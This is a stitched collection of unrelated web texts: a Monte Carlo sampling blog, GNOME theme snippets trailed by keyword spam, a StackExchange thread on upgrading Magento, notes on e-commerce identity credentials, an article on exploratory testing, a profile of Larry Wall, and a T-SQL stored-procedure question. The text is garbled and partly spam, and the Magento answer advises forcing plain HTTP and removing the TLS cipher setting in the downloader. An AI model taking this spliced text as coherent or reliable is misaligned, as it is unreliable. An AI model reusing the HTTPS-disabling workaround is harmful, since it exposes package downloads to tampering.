hand, chooses coordinate pairs entirely independently of one another, and values within each dimension of the Path Space that are highly dependent on one another. These characteristics of the Metropolis sampler are undesirable, which is why adding a dependency within coordinate pairs (Gibbs Sampling) helps to accelerate multi-dimensional Metropolis Samplers. It’s been a couple of weeks since I stopped working directly on rendering and took some time to read up on a topic called Hamiltonian (Hybrid) Monte Carlo which is to be the main focus of my research for the foreseeable future. Hamiltonian Monte Carlo comes from a physics term of the same genesis called Hamiltonian Dynamics. The general idea being that, like with a Lagrangian equation for a system, you find a way to model the energy of a system which allows you to estimate it at efficiently even when the system is highly dimensional. With a Lagrangian you aim to minimize the degrees of freedom to reduce computation, and similarly with a Hamiltonian you reduce the problem to a measure of the systems kinetic K(p) and potential U(x) energy. This allows you to describe the entire state of an arbitrarily dimensional system as the sum of these measures, i.e. H(x,p) = U(x) + K(p) Above is our faithful companion, Metropolis Hastings Monte Carlo (MHMC), simulating a Normal distribution with mean “ and variance 3. The simulation was run for 10,000 samples yielding the shown results. Some things worth noting here are features such as the Error curve (Orange), which varies dramatically as simulation progresses. This is in-part due to the nature of the Random Walk which MHMC takes through the integration space which can be seen in the Blue graph to the bottom left. It is clear from the Blue graph that two states x' in the Makrov Chain are tightly dependent on one another. Next we see the same Normal distribution used above, estimated this time using Hamiltonian Monte Carlo (HMC) with trajectory length 20 and step size 0.07. To compare this to our previous simulation using MHMC several things become apparent. Firstly, The Error curve (Orange) seems to decay in a much more controlled and systematic manner. As opposed to the Error for MHMC which was erratic due to the nature of a Random Walk, here we see the benefit of making an informed choice as to where to place the next sample. From this we can hypothesise that a optimally tuned HMC simulation will in general reduce the error of the simulation with more samples consistently with little chance of introducing large, random, errors as with MHMC. Additionally in the sample placement graph (Blue) we see that the relationship between two states x' is far more abstracted, meaning two samples while being related and forming a valid Markov Chain will not reduce the accuracy of the simulation by treading on each others turf. There is however, an issue with the above HMC simulation. Tuning. Unless properly tuned for the specific problem the Hyper-parameters for the Trajectory length L and Step size E will simply not work as intended and will yield poor results. Above is a second run of the HMC simulation, this time with trajectory length 10 and step size 0.05. Because the length of the Leapfrog Trajectory was not sufficient to allow the system to move to an independent state we see the same banding of samples in the sample frequency graph (Blue) as we saw in the original Metropolis simulation. Additionally because of the dependent nature of the samples a similar pattern is seen in the Error curve (Orange) where the curve has large peaks where error was reintroduced to the system like with a Random Walk. It is therefore vital to optimally tune HMC as the computation for each sample is an order of magnitude larger than with MHMC. Without proper tuning it’s much better to stick with the easier to tune MHMC.
OPCFW_CODE
Once this is done, all you have to do is click on install links on gnome- and them click "OK" and the themes will be installed in ~/.themes. Restart the Tweaks tool and your new themes should be available. Tested on Debian. It used to be very easy to install custom themes in Gnome 2, but if you have upgraded to Gnome Shell, particularly in Ubuntu Oneiric, you will find that there are not much customization options available for you. While Gnome Shell supports theming, there doesn’t seem to be an option for you to switch to . You can install this themes on all version of Ubuntu and Ubuntu-based distros, Arch Linux and Arch Linux based distros, Elementary OS, Debian 8, Fedora 21-24, OpenSUSE. And all other distros based on these mentioned Linux platforms should not have any problem to install this icon theme. Installing Gnome 3.20 in Ubuntu and Linux Mint For you to be able to install Gnome 3.20 on Ubuntu 16.04 or its derivatives such as Linux Mint 17, you will need to add the GNOME staging repository using the commands below. The brave fearless volunteers behind Ubuntu GNOME are very happy to announce the official release of Ubuntu GNOME 16.04 LTS supported for 3 years and this is. Every part of GNOME 3 has been designed to make it simple and easy to use. The Activities Overview is an easy way to access all your basic tasks. A press of a button is all it takes to view your open windows, launch applications or check if you have new messages. Having everything in one place is convenient and means that you don’t have to learn your way around a maze of different technologies. 31/10/2017 · Since Ubuntu 17.10 has changed the default desktop environment to GNOME, it is slightly different to change the themes in the new version. material-black COLORS is a new GTK, xfwm4, GNOME-Shell, and Cinnamon- Dark Mode Theme with matching Icons and Folders. The material-black COLORS theme is based on Material Design standards and aims to bring a warm, colorful, and elegant experience to your desktop. With GNOME 3.16, new logo and new Ubiquity Slideshow, the Ubuntu GNOME Team is very happy to announce the release of Ubuntu GNOME 15.10 Wily Werewolf. The New Logo: Social Media banner announcing the release of Wily Werewolf: Ubuntu GNOME is an official flavor of Ubuntu, featuring the GNOME desktop environment. Ubuntu GNOME is a mostly pure. I have been trying to install this theme for the last couple of hours, but I just don't get it. I just started out with Linux the other day so I am fumbling around in the dark as well. This is the. We have got many emails from user to write an article about GNOME 3 desktop customization but we didn’t get time to write this topic.I was using Ubuntu operating system since long time in my primary laptop and I got bored so, I would like to test some other distro which is related to Arch Linux. 10/03/2017 · Welcome back to P&T! Today's Video is about customizing Ubuntu GNOME the way I Engunto do it. I didn't really have editing time so sorry for the pauses, this was the first video I've done in. List of Top Ubuntu Themes: Top 17 Best Themes For Ubuntu. Top Ubuntu Themes For Ubuntu 18.04 LTS. Ubuntu Themes Collection. Flat theme, Icon Themes and more. As a result, a lot of Gnome theme developers work really hard to turn the shell into a complete, themed experience. Since Gnome Shell has so many themes In this list, we’ll go over the 8 best Gnome Shell themes, where to get them, and how to use them! To change the GTK theme in GNOME 3 with or without GNOME Shell, you can use Gnome Tweak Tool which is available in the GNOME 3 Ubuntu PPA, official Ubuntu 11.10 and Fedora 15 repositories, etc. If you're using Ubuntu 11.04 and the GNOME 3 PPA or Ubuntu 11.10,. This quick tutorial is going to show Gnome Desktop beginners how to enable the 'Shell theme' drop-down box in the Gnome Tweak Tool. The Gnome Tweak Tools, A.K.A. Gnome Tweaks is a customization console for the Gnome 3 Display Manager. It provides a lot of options not available in the normal settings panel. Most of the settings are visual, which allows you to customize the look and feel of Gnome. There are also extensions that allow you to add new functionality to your. 10 Best GTK Themes For Ubuntu 18.04. Ubuntu Flat Themes, Ubuntu Icon Themes, Best Ubuntu Themes, Ubuntu 18.04 LTS Themes, Gnome Themes, Ubuntu Desktop Theme. Nordic Theme on Ubuntu Desktop GNOME 3 Nordic is currently ranked 10 most popular GTK3 theme on. This article exposes this theme beauty and explains how to install every component on Ubuntu 18.04. Please note that it's no longer required to copy the theme to ~/.themes/ too for the Mutter theme to work tested on Fedora 15 and ubuntu natty 11.04 with all the packages up to date. After changing the Mutter theme, remember to reload Gnome Shell ALTF2 and enter "r" or log out. Dans Ubuntu il y a déjà un autre thème que le thème ubuntu. C'est le thème freedesktop qui se présente sous la forme d'un paquet DEB. Vous pouvez aller le cocher dans Synaptic. 1ére solution le paquet debian Disons que le deb freedesktop est le deb du débutant, pour qu'il ait au moins facilement le choix entre deux thèmes. Mais je ne. 07/09/2017 · However, a "Classic" desktop built upon GNOME 3 is still available. Installation. Install the gnome-session-fallback package from the universe repository, log out, and choose GNOME Classic at the login screen. The only remaining supported Ubuntu release that supports the gnome-session-fallback package is Ubuntu 12.04 Precise Pangolin. Your donation will ensure that GNOME continues to be a free and open source desktop by providing resources to developers, software and education for end users, and promotion for GNOME worldwide. The GNOME Project is a diverse international community which involves hundreds of contributors, many of. On retrouve donc en partie GNOME 3.16, puisque Ubuntu préfère les versions éprouvées et refuse donc de proposer la dernière version de GNOME. Et en partie, puisque certaines applications, telles que Fichiers ou les Comptes en ligne, ne sont disponibles qu’en version 3.14. Pour le thème d’icônes ou le logiciel de gravure, nous avons. This script installs the latest git versions of some fine GNOME themes into the current user's.themes folder. Run the script again whenever you want to get the latest theme updates. Many of these themes are updated frequently with bugfixes and enhancements. It supports GNOME versions 3.22 and above. Arc Theme. Arc is a flat theme with transparent elements for GTK 3, GTK 2 and GNOME Shell which supports GTK 3 and GTK 2 based desktop environments. 19/09/2012 · This guide is written for Ubuntu 12.04 LTS, which is a five year support version. With the removal of support in 12.10 for Unity 2D and Metacity, the future of the Gnome classic option looks doubtful. Therefore this wiki cannot be guaranteed to work on any later version of Ubuntu- it may work, but proceed at your own risk! Logo Ma Mawar 2020 Microsoft Store Peinture 3d 2020 Matroska Opencv 2020 Adobe Pdf Activer La Vue 3d 2020 Format Dxf Co Au Format Za 2020 Nokia 1600 Code De Déverrouillage 2020 Yowhatsapp Apk Mai 2019 2020 Desactiver Ransomware Windows Defender 2020 Réparation Usb Diskpart 2020 Connectify Dispatch Pour Linux 2020 Pilote Descargar Epson L6160 2020 Gestionnaires De Durée De Vie Microsoft Unity 2020 Divi Person Custom 2020 Pl / Sql Activer Dbms_output 2020 Asus Amda00 Interface Windows 7 2020 Téléchargement De La Boîte À Outils Windows Office 2010 2020 Implications Du Changement D'identifiant Apple 2020 Ancienne Chanson Mp3 1995 À 2005 2020 Bobine De Noyau Gt8 4 2020 Microsoft Embauche-t-il Des Jeunes De 16 Ans 2020 Désinstaller Jdk 9 Sur Mac 2020 Mac Os Mojave Dmg Google Drive 2020 9 Idcams Listcat Syntax 2020 Audition D'adobe D'essai De Menghilangkan 2020 Téléchargement Gratuit Simple Ocr 2020 Programme Pl / Sql Pour Afficher Les Détails Des Employés À L'aide Du Curseur 2020 Horodatage Convertir Heures 2020 7 Icône De Téléchargement Zip 2020 Logo De 24 Oras 2020 Erreur De Démontage 2 Windows 7 2020 Pilote De Scanner Canon Mx510 Mac 2020 Sketchup Up 2016 2020 1 Code Machine Easeus 2020 Fenêtres Pour Chrome 2020 Themeforest Drupal 7 Thèmes 2020 Surface Pro 5 Meilleur Achat Canada 2020 Logo Ismaily Sc 2020 Version De Support Étendu De Firefox 52 2020 Logo De Photographie Dans Photoshop 2020 Télécharger Le Firmware J1 2020
OPCFW_CODE
Magento Update: There is no Mage_All_Latest in Magento Connect? I want to update my Magento <IP_ADDRESS> over Magento connect. BUT there are only the installed extensions listed. No Magento entries order even Mage_All_Latest. So I followed some tips from this forum and tried to install Mage_All_Latest. but every time i got some errors that the files are exciting. so how can i install Mage_All_Latest (and/or update my Magento)? i hope i don't have to build my whole site new. can you send the error screenshot As you see: no magento files... so I tried to install Mage_All_Lastest with this code: http://connect20.magentocommerce.com/community/Mage_All_Latest Then, after Magento worked, I got the following log: Checking dependencies of packages Already installed: community/Interface_Frontend_Rwd_Default <IP_ADDRESS>, skipping Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping CONNECT ERROR: Package 'Mage_All_Latest' is invalid '.\pkginfo\Mage_All_Latest.txt' already exists Package 'Interface_Adminhtml_Default' is invalid './app/design\adminhtml\default\default\etc\theme.xml' already exists Package 'Interface_Frontend_Default' is invalid './app/design\frontend\default\default\etc\theme.xml' already exists Package 'Interface_Install_Default' is invalid './app/design\install\default\default\etc\theme.xml' already exists ....,.and so on so you are not getting magento packages right? Please follow the below steps: Copy the var/package folder from default magento<IP_ADDRESS> and paste in your magento var/ Delete pkginfo/Mage_All_Latest.txt folder After this if you still not getting upgrade options, please follow the below steps: Go To downloader/lib/Mage/HTTP/Client/Curl.php Find line: $uriModified = $this->getModifiedUri($uri, $https); Before this line write: $https = false; Comment this line: $this->curlOption(CURLOPT_SSL_CIPHER_LIST, 'TLSv1'); please try this and let me know the progress thanks Yes, this will useful. hi, sorry, i wasn't on the pc... first, thanks for your tips...what do you mean with default magento? do you mean the "fresh"/"naked" magento before any theme and so on? went great if have the options now... but sadly it conflicts now: Checking dependencies of packages Installing package community/Phoenix_Moneybookers <IP_ADDRESS> Package community/Phoenix_Moneybookers <IP_ADDRESS> installed successfully Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping Package upgraded: community Phoenix_Moneybookers <IP_ADDRESS> CONNECT ERROR: Package community/Mage_Core_Modules <IP_ADDRESS> conflicts with: community/Interface_Frontend_Base_Default <IP_ADDRESS>, Package community/Lib_Js_Mage <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS> Package community/Lib_Phpseclib <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS> Package community/Lib_Mage <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS> did you Delete pkginfo/Mage_All_Latest.txt folder before upgrade start? yes, it was deleted. :-( tried it today again, but there appears everytime the same error (new module <IP_ADDRESS> conflicts with <IP_ADDRESS> [CONNECT ERROR]) => e.g CONNECT ERROR: Package community/Lib_Credis <IP_ADDRESS> conflicts with: community/Mage_Core_Modules <IP_ADDRESS> IT WORKS!!! i found the mistake: only Mage_All_Lastest was allready at <IP_ADDRESS> so i uninstalled it to <IP_ADDRESS> again and started the update again... now I am an <IP_ADDRESS>! thanks for your help Raghu! :-) the only thing now: some CMS-pages (e.g. business terms) are empty now - do you know what there is going on? (I use MageSetup) can you send me the frontend link sadly is at the moment on my localhost with wampserver :-( ok np..no cms page will be effected when upgrade is done.. please remove cache and session once and check ...I read somthing like the blocks of magesetup need after a magento update extra permissions in system=>permissions=>blocks, did you hear from that? how can i set this permissions? already all block types will be there in permissions. If your custom block type is not present at that location you have to add new block and save as allowed thats it i add: cms/business_terms => Allowed but nothing changed actually do you want to change/create cms page or any block types? ...it works!! i just filled in "cms/block" and all is fine! all missing content is shown now! Raghu, thank you so much for your help!! :-) Here is my magento connect (without the Mage_All_Lastest): As you see: no magento files... so I tried to install Mage_All_Lastest with this code: http://connect20.magentocommerce.com/community/Mage_All_Latest Then, after Magento worked, I got the following log: Checking dependencies of packages Already installed: community/Interface_Frontend_Rwd_Default <IP_ADDRESS>, skipping Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping CONNECT ERROR: Package 'Mage_All_Latest' is invalid '.\pkginfo\Mage_All_Latest.txt' already exists Package 'Interface_Adminhtml_Default' is invalid './app/design\adminhtml\default\default\etc\theme.xml' already exists Package 'Interface_Frontend_Default' is invalid './app/design\frontend\default\default\etc\theme.xml' already exists Package 'Interface_Install_Default' is invalid './app/design\install\default\default\etc\theme.xml' already exists Package 'Mage_Downloader' is invalid '.\downloader\js\prototype.js' already exists Package 'Mage_Centinel' is invalid './app/code/core\Mage\Centinel\Block\Adminhtml\Validation\Form.php' already exists Package 'Interface_Frontend_Base_Default' is invalid './app/design\frontend\base\default\etc\theme.xml' already exists Package 'Phoenix_Moneybookers' is invalid './app/code/community\Phoenix\Moneybookers\Block\Form.php' already exists Package 'Mage_Compiler' is invalid './app/code/core\Mage\Compiler\Block\Process.php' already exists Package 'Magento_Mobile' is invalid './app/code/core\Mage\XmlConnect\Block\Adminhtml\Admin\Application\Edit\Form.php' already exists Package 'Lib_Cm' is invalid './lib\Cm\Cache\Backend\Redis.php' already exists Package 'Cm_RedisSession' is invalid './app/code/community\Cm\RedisSession\Model\Session.php' already exists Package 'Mage_Core_Adminhtml' is invalid './app/code/core\Mage\Adminhtml\Block\Abstract.php' already exists Package 'Mage_Core_Modules' is invalid './app/code/core\Mage\Admin\Helper\Data.php' already exists Package 'Lib_Js_Ext' is invalid '.\js\extjs\css\README.txt' already exists Package 'Lib_LinLibertineFont' is invalid './lib\LinLibertineFont\Bugs' already exists Package 'Lib_Js_TinyMCE' is invalid '.\js\tiny_mce\classes\AddOnManager.js' already exists Package 'Lib_Varien' is invalid './lib\Varien\Autoload.php' already exists Package 'Lib_Google_Checkout' is invalid Empty package contents section Package 'Lib_Js_Calendar' is invalid '.\js\calendar\calendar-blue.css' already exists Package 'Lib_Js_Mage' is invalid '.\js\lib\FABridge.js' already exists Package 'Lib_Phpseclib' is invalid './lib\phpseclib\Crypt\AES.php' already exists Package 'Lib_Mage' is invalid './lib\Mage\Archive\Abstract.php' already exists Package 'Lib_Magento' is invalid './lib\Magento\Autoload\ClassMap.php' already exists Package 'Lib_Credis' is invalid './lib\Credis\Client.php' already exists Package 'Lib_Pelago' is invalid './lib\Pelago\Emogrifier.php' already exists Package 'Lib_ZF' is invalid './lib\Zend\Acl\Assert\Interface.php' already exists Package 'Lib_Js_Prototype' is invalid '.\js\prototype\debug.js' already exists Package 'Lib_ZF_Locale' is invalid './lib\Zend\Locale\Data\Translation.php' already exists Hello and Welcome to StackExchange. This is not an answer. Please add your question details to the question itself by editing it.
STACK_EXCHANGE
In the context of the ENSURESEC e-commerce ecosystem, the proposed use cases will use the Ecommerce-SSI Bridge to implement the following workflows. Secure Goods Distribution Delivery Company Identity and Scanners Verification Problem: Protection of a Delivery. Company X wants to protect its goods from being handled by unauthorized carriers, and threats or frauds in the distribution chain. - An authorized employee of delivery company X uses the Ecommerce-SSI Bridge to register an identity (DID) for their organization. - An e-commerce operator verifies the delivery company’s organization identity and uses the Bridge to issue a credential for the company to deliver on their behalf. The credential contains the company organization DID and is signed by the e-commerce operator’s private key which had been previously associated with the operator’s identity. - The authorized employee of the verified delivery company registers a DID for each scanner (i.e. android scanners) used by the company couriers. - The authorized employee uses the Ecommerce-SSI Bridge to issue authorization credentials to the scanner devices used to handle deliveries. These credentials are stored locally in the scanner devices. - When a courier hands over the delivery, the scanner device uses the Ecommerce-SSI Bridge to present its credential to the e-commerce operator. - The e-commerce operator uses the Ecommerce-SSI Bridge to verify that the parcel was only handled by an authorized courier, and it was not stolen or diverted in transit. This is possible because of the verification of the device handling the scanning of the delivery. - (optional) The customer can acquire the courier’s scanner device credential in the form of a QR code. The QR code can be read using a mobile phone and the Ecommerce-SSI Bridge to verify that the scanner device belongs to a delivery company authorized by the e-commerce operator. This allows for verifying authentic deliveries. Customer Identity and Delivery Verification Problem: Proof of Collection. Customers and e-commerce providers want to guarantee goods are collected by the right customer and avoid threats and frauds in the distribution chain. - A customer creates a decentralized identity (DID) using a mobile application. This application can be a standalone credential wallet or an e-commerce shopping app. - The customer performs a purchase on an e-commerce site. - The e-commerce site uses the Ecommerce-SSI Bridge to issue a proof of purchase credential to the customer, which is saved to the customer’s phone. - The customer receives the product delivery and presents the credential in a QR code to the courier scanner. - The courier acquires the credential and uses the Ecommerce-SSI Bridge to verify its authenticity. The delivery is safely handed over to the right customer. - (optional) The customer acquires the courier’s scanner credential (see Delivery Company Identity and Scanners Verification) and uses the Ecommerce-SSI Bridge to verify that it belongs to an authorized delivery company assuring the customer knows the delivery is legitimate. The two scenarios above become even more interesting in the case of automated (i.e., drones) delivery and could even include product identification. Secure E-commerce Sales Customer Identity and Credential Age Verification Problem: Verify a customer’s identity and avoid collecting and storing personal information. This would increase compliance and reduce liability for e-commerce and small sellers. - An authorized bank employee registers an organization decentralized identity (DID) for its bank. - A customer creates a decentralized identity (DID) using a mobile application which could be a standalone credential wallet or an e-commerce shopping app. - The customer requests an Issuer (e.g. a bank) to issue a credential stating their age. - The Issuer uses previously verified information about the user held on local record and the Ecommerce-SSI Bridge to create and issue a verifiable credential to the customer. - The customer (namely Owner) downloads the credential in their app using a credential wallet. - The customer purchases an item that requires age verification on an e-commerce site. - The customer provides their credential to the e-commerce website using the Ecommerce-SSI Bridge. - The e-commerce site uses the Ecommerce-SSI Bridge to verify the credential and authorize the purchase. A similar scenario can be applied in the online purchase of dedicated drugs for specific health conditions. A general practitioner could issue a credential to the customer stating their condition. Seller Identity Verification Problem: Verify a seller's identity. This verification would reduce small sellers' compliance burden and reputation risks. - An e-commerce site allows an employee, which the seller previously authorized, to create a decentralized identity (DID for organization) using the Ecommerce-SSI Bridge. - The seller requests an Issuer (e.g. its bank) to issue a credential stating its Know Your Customer (KYC) status. - The seller presents the credentials to the e-commerce site operator using the Ecommerce-SSI Bridge. - The e-commerce site operator verifies the seller’s credentials using the Ecommerce-SSI Bridge and allows the seller to trade on its marketplace Product Identity and Authenticity Problem: Verify product authenticity. This verification would reduce counterfeit. - An e-commerce site allows the seller to create a decentralized identity for each of its products (DID for objects) using the Ecommerce-SSI Bridge. - The e-commerce site allows the seller to create and sign an authenticity credential associated with a given product identity using the Ecommerce-SSI Bridge. - A user app allows a customer to obtain the product authenticity credential. The customer could achieve this by scanning a QR code from an e-commerce site, or it can even be directly attached to a purchased product. - A user app allows the customer to verify the signature of the product authenticity credential using the Ecommerce-SSI Bridge, allowing verification of the seller's identity.
OPCFW_CODE
By David Borcherding, Seapine Software, Inc. More and more medical devices have some sort of software component to them. The teams responsible for testing this software often rely on scripted testing, both manual and automated, to decrease the risk of defects in a product under development. Scripted testing is documented in test plans or test protocols with test cases or test procedures with the documented evidence of test results or test runs. The problem with this approach is that scripted testing is not meant to identify error conditions in scenarios that significantly deviate from the design or requirements, even if a comprehensive risk management plan is followed. To find these hidden or divergent risks, you need to go off script, and that’s where adding exploratory testing can help. Exploratory testing — sometimes called usability testing, use testing, user testing, or formative evaluations — is the hands-on, simulated-use testing done to discover and explore unanticipated hazards. It’s almost impossible to plan tests that cover every variation in data, configuration, interaction, sequence, timing, and so on. Scripted tests are designed to ensure that the product meets the requirements (using new feature test cases) and to mitigate the risk of new features breaking existing functionality (via regression test cases). Experienced testers can anticipate issues that might occur, but it may be too costly or time-consuming to write a test case for every scenario that comes to mind. In her book Explore It! Reduce Risk and Increase Confidence with Exploratory Testing, Elisabeth Hendrickson says the best test strategy answers two core questions: - Does the software behave as intended under the conditions it’s supposed to be able to handle? - Are there any other risks? Scripted testing can answer the first question, but to find those potentially critical “other risks,” you need to explore. Push The Envelope Exploratory testing puts the thinking back in the hands (or rather, the head) of the tester. As an exploratory tester, you design the test, you execute it immediately, you observe the results, and you use what you learn to design the next test. You’re not just following steps in a test case someone else created; you’re pushing the application or product to its limits to gain a better understanding of how it works and where it breaks. You see it from the user’s point of view, rather than the developer’s. Ultimately, you get a more complete view of the product — including its weaknesses and hidden risks. Discover More Defects On average, 11 percent more overall software defects are discovered through exploratory testing vs. scripted testing. For defects that should be immediately obvious, such as a missing button in the user interface, exploratory testing discovers 29 percent more vs. scripted. When it comes to “complex” bugs (bugs requiring three or more user actions to cause an error or failure), it jumps to 33 percent more defects found. (Source: Defect Detection Efficiency: Test Case Based vs. Exploratory Testing) The reason you find more defects when using an exploratory method is because you have more latitude to try different types of tests, using your past experience and knowledge of the product. Scripted testing, on the other hand, limits you to only the steps outlined in test cases, which, in turn, limits your ability to consider other test scenarios. There are numerous reasons why test cases don’t always lead to finding bugs, such as how well the test case was written (did the analyst understand the requirement?), who wrote the test case (is the analyst writing the test case knowledgeable about how the product works?), how well the requirements document described new functionality, and so on. Even if you had perfect test cases, exploratory testing would still find more defects over the course of a release, for several reasons: - You tend to find a good number of defects when “testing around” functional areas while verifying defects. Fixing an issue often breaks something else. - If a defect exists and is not found while executing the initial test run (following the test cases steps), it is unlikely that the next tester running the same test will find the defect. However, exploratory testing in the same functional area may reveal the bug. - Exploratory testing allows you to think outside the box and come up with use cases that might not be covered in a test case. For example, you might perform one test and then ask yourself, “What if I tried this? What if I didn’t do that?” - Some defects, typically the hard ones to find, are dependent on a sequence of events. If you don’t have really deep test cases, you can miss finding defects that exploratory testing can find in a less-structured, longer test session. Find The Most Important Defect In The Shortest Time Because you are not bound by the test case steps, exploratory testing makes finding important defects faster. Essentially, it allows you to cover more ground and focus on testing the “what ifs.” For example, let’s say you’re assigned to test the “Edit Patient Name” functional area in a product. There are two possible scenarios for your assignment: - Execute a test run, or - Perform exploratory testing on the “Edit Patient Name” functional area. In the first scenario, you would follow the steps outlined in the test case to verify that each step works, reporting any bugs that are found. But what if the most important bug — the one that crashes the application and deletes the user’s data — doesn’t occur during these steps? You won’t find it. In the second scenario, you explore or “test around” editing the patient name. At first, you might perform the same steps as at the beginning of the test case. As testing progresses, however, you might ask, “What happens when I click Edit, delete the name, and try to save the patient name with a blank field?” And boom, the application crashes and deletes all of the user data. You just found the most important bug by exploring something that wasn’t a step in the test case. Exploratory Testing Feeds Scripted Testing When exploratory software test sessions are recorded, they can easily be converted into repeatable test cases or regression tests without the need for you to take notes in a separate document or notebook. A test session recording application records all activity and builds a detailed history of the test session, including descriptions of the user interface controls used and a screen shot of every step with the relevant graphical user interface (GUI) element automatically highlighted. Once you’re done exploring, the app generates a step-by-step written script of the test steps in plain English. You can then save this script as a test case in your test case management solution. Test session recording apps simplify the defect reporting mechanism for risks found in exploratory test sessions, because they make it easy for you to go back and reproduce the error. Steps and screens are automatically captured, so there’s no need to do all of that manually when submitting an issue to development and documenting a risk mitigation with a test case. Fill The Gap As corporate belts tighten and cause reductions in testing budgets and staff, you might be tempted to settle for a documented test approach because you know it will satisfy your company’s quality standards or auditors. All that really does, however, is open the door to risk. Combining exploratory testing with mandated documented scripted testing can help fill the gap left by shrinking resources to keep your test effort strong and reduce the risk of issues in the final product.
OPCFW_CODE
Three Innovator Lessons from Larry Wall Who is Larry Wall? Many of you may not know who he is. He is the father of Perl, a programming language that is more popular among system administrators. He created Perl in mid-1980s. You may never hear his work, but there is something we can learn from his life as a programmer and innovator. Today I want to share the three attributes of innovators, inspired by Larry Wall as he is mentioned and described in the book Learning Perl, by Randal L. Schwartz, Tom Phoenix, & brian d foy (I don’t have any idea why the last name is written in lower case). 1) Be Lazy Some people are so diligent working on the same thing over and over. Larry is not following that status quo, he is lazy. Larry was trying to produce some reports from a Usenet news (some kind of discussion forum which is a precursor of different web forums available nowadays). Being the lazy programmer as he is, he decided to overkill the problem with a generic solution, where he can also use it in at least one other place. This is the laziness that he also puts in the three virtues of programmers. Laziness – The quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful, and document what you wrote so you don’t have to answer so many questions about it. Larry Wall, Randal L. Schwartz and Tom Christiansen (Programming Perl) 2) Be Greedy Larry created Perl because he wanted the advantages of both sides of programming language. On one side, it’s the low level programming (C or C++) which is hard to write, but fast and unlimited. On the other side, it’s high level programming (“shell” programming) that slow and limited but easier to code. Larry is not satisfied with either one of them. He chose to create something that will incorporate the strength of those two. And Perl is born, easy, nearly unlimited, mostly fast and kind of ugly. 3) Be Ugly Larry knew very well what he want to create through Perl. He chose to trade off certain thing for the goal he pursued. He knew that he could not please all people. When he had to make a trade off between features that make programmer’s life easier but make it more difficult for student to learn, he will pick the programmer’s side. Perl has many conveniences that let programmers save time. And that results in how Perl looks ugly for the beginners. If you’re not an experienced Perl programmer, you will need some time to understand all the code and shortcuts. Perl is symbolized as a camel. Camel is kind of ugly too, but they work hard. Camel gets the job done even in a tough conditions like the desert, even if it looks ugly and smells worse, or sometimes even spit at you. Yes, it’s not all the attributes needed as an innovator, but they exactly represent the attributes that not many people consider as virtue. Larry has turned the limitations to advantages. They have become something beneficial to Larry’s life as programmer and innovator. Despite of the laziness, Larry took pride and believed in his solution. He worked hard at it. He introduced the Perl to the community of users. And that is followed by a number of feedbacks and questions. Larry did not grow weary on responding but he consistently grew his work on Perl. Now Perl is widely recognize, installed in nearly every system in use today, thousands of pages of online documentation, dozens of books and several main streams of newsgroups and discussions. It’s the fruit of what Larry Wall has worked in.
OPCFW_CODE
TSQL concatenate parameters I'm attempting to determine why my stored procedure will not operate correctly. The issue is when I utilize a concatenated parameter. When finished, I will have 6 or 7 of these, each built upon the last. I've tried every variation including =, like, %, spaces, no spaces, and cannot come up with the correct syntax to make this operational. I have also did a 'hard coded' test, and it works fine, so the data is correct. HELP! Thanks Here's the code - ALTER PROCEDURE [dbo].[rspSCLTEST] (@RRID as varchar(4), @State as varchar(2), @Sub as varchar(75)) AS BEGIN SET NOCOUNT ON; DECLARE @SQL as varchar(4000) SET @SQL = @State --add the subdivision to the where statement If @Sub = 'ALL' SET @SQL = @SQL ELSE SET @SQL += ' AND (C.SubDivision = '+ @Sub + ')' SELECT C.CRID, C.DOT, C.RR, C.Pref, C.MP, C.Division, C.SubDivision, C.City, C.Street, C.State, C.County, C.RestrictedCounty, C.Remarks, C.SpecialInstructions, C.Route, C.ThirdAppRequired, C.MainTrks, C.OtherTrks, C.OnSpur, C.MaxSpeed, C.SubContracted, C.FenceEncroachment, C.Lat, C.Long, C.PropertyType, C.WarningDevice,C.Surface, C.ROWNE, C.ROWNW, C.ROWSE, C.ROWSW, C.ROWWidth, C.ExtNE, C.ExtNW, C.ExtSE, C.ExtSW, C.TempActive, C.PCO, A.App1Date, A.App1Cut, A.App1Spray, A.App1Inspect, A.App2Date, A.App2Cut, A.App2Spray, A.App2Inspect, A.App3Date, A.App3Cut, A.App3Spray, A.App3Inspect FROM Crossings AS C LEFT OUTER JOIN AppData AS A ON C.CRID = A.CRID WHERE (C.DeletedCrossing = 0) AND (C.RR = @RRID) AND C.State = @SQL END you need to work on your question first, post some code and I think you are trying to concatenate parameters, if so use + operator. The problem is that you are confusing dynamic SQL with parameter replacement. Try something like this: and c.state = @state and (@sub = 'ALL' or c.subdivision = @sub) The way you had this written, you were checking for: and c.state = '<state> and c.subdivision = @sub' That is, the second clause is not being interpreted as a clause, it is being interpreted as part of the state. the issue here is, that if @sub = 'All', I don't need the parameter included at all. "all" means give me all of the subdivisions, not just the one I'm asking for. I've also attempted to say If Sub = 'All' SQL = SQL + '(C.SubDivision = ' + C.SubDivision + ')' @CindyBrozyno . . . that is what this logic does. How would this work when you have a field that is datatype BIT, and not varchar? for instance - Field= subcontracted. The user can choose to see all that ARE subcontracted, all that ARE NOT subcontracted, or ALL records. @CindyBrozyno . . . something like field = (case when @t = 'subcontracted' then 1 when @t = 'all' then field else 0 end). Same idea but with three values. This line: SET @SQL += ' AND (C.SubDivision = '+ @Sub + ')' And this line: AND C.State = @SQL appear suspect. I can only make assumptions about your data, but it looks like you've got two different objects: State, and Sub-division. What kind of data is in C.State? Is it just state abbreviations? (OR, WA, MO, MN, AZ, etc.). If so, you'll never get a positive result out of WHERE C.State = WA123 (assuming '123' is a sub-division value). In any case, could you do something like this? --> WHERE C.State = @state AND C.Subdivision = @sub
STACK_EXCHANGE
